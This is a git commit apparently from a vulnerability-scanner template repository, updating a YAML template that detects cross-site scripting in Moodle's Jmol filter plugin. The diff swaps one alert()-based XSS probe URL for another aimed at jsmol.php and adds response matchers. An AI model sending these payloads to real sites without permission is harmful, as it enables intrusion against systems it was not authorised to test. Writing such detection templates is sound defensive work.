Merge pull request #1993 from projectdiscovery/template-fix

Fix for moodle-jitsi-plugin-xss
2021-07-14 16:14:54 +05:30 · 2021-07-14 16:14:54 +05:30 · b3e1832d6b
parent f7259df034 7e258fcae2
commit b3e1832d6b
1 changed files with 10 additions and 2 deletions
--- a/vulnerabilities/moodle/moodle-filter-jmol-xss.yaml
+++ b/vulnerabilities/moodle/moodle-filter-jmol-xss.yaml
@ -5,18 +5,26 @@ info:
  author: madrobot
  severity: medium
  description: Cross-site scripting on Moodle.
+  reference: https://www.dionach.com/blog/moodle-jmol-plugin-multiple-vulnerabilities/
  tags: moodle,xss

 requests:
  - method: GET
    path:
-      - "{{BaseURL}}/filter/jmol/iframe.php?_USE=%22};alert(1337);//"
+      - "{{BaseURL}}/filter/jmol/js/jsmol/php/jsmol.php?call=saveFile&data=%3Cscript%3Ealert(%27XSS%27)%3C/script%3E&mimetype=text/html"
+
    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200
+
      - type: word
        words:
-          - '\"};alert(1337);//'
+          - "<script>alert('XSS')</script>"
        part: body
+
+      - type: word
+        part: header
+        words:
+          - "text/html"